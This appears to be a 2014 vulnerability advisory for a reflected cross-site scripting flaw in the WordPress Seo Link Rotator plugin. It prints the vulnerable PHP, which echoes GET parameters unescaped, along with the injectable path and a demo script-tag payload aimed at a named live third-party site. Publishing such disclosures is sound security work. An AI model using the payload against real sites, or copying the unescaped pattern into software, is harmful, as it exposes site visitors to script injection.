WordPress Seo Link Rotator Cross Site Scripting

2014.01.28
Credit: ACC3SS
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

###################### # Exploit Title : Wordpress Seo Link Rotator Plugin Cross Site Scripting # Exploit Author : ACC3SS # Vendor Homepage : http://www.seolinkrotator.com # Software Link : http://www.seolinkrotator.com/download/files/seolinkrotator.zip # Date : 2014-01-19 # Tested on : Windows 7 / Mozilla Firefox Web Browser # Discovered by : ACC3SS ###################### # Vulnerability code : <?php $action = $_GET['action']; switch($action){ case "buildLink": $linkURL = $_GET['URL']; $linkTitle = urldecode($_GET['title']); $type = $_GET['type']; ?> <div class="seoLinkRotatorInfo"> <h2>Link To This <?=ucwords($type)?></h2> <p>If you would like to share this <?=$type?> with someone else just copy and paste the HTML into one of your pages:</p> <div class="seoLinkHTMLBox"> <?php echo '&lt;a href="' . $linkURL . '"&gt;' . $linkTitle . '&lt;a&gt;'; ?> </div> </div> <?php break; default: echo 'Unkown action'; break; } ?> ###################### # Location : localhost/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title=[Xss] ###################### # Demo : # http://www.porterpr.com/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title= "/><script>alert(1);</script> ######################

References:

http://www.seolinkrotator.com/download/files/seolinkrotator.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top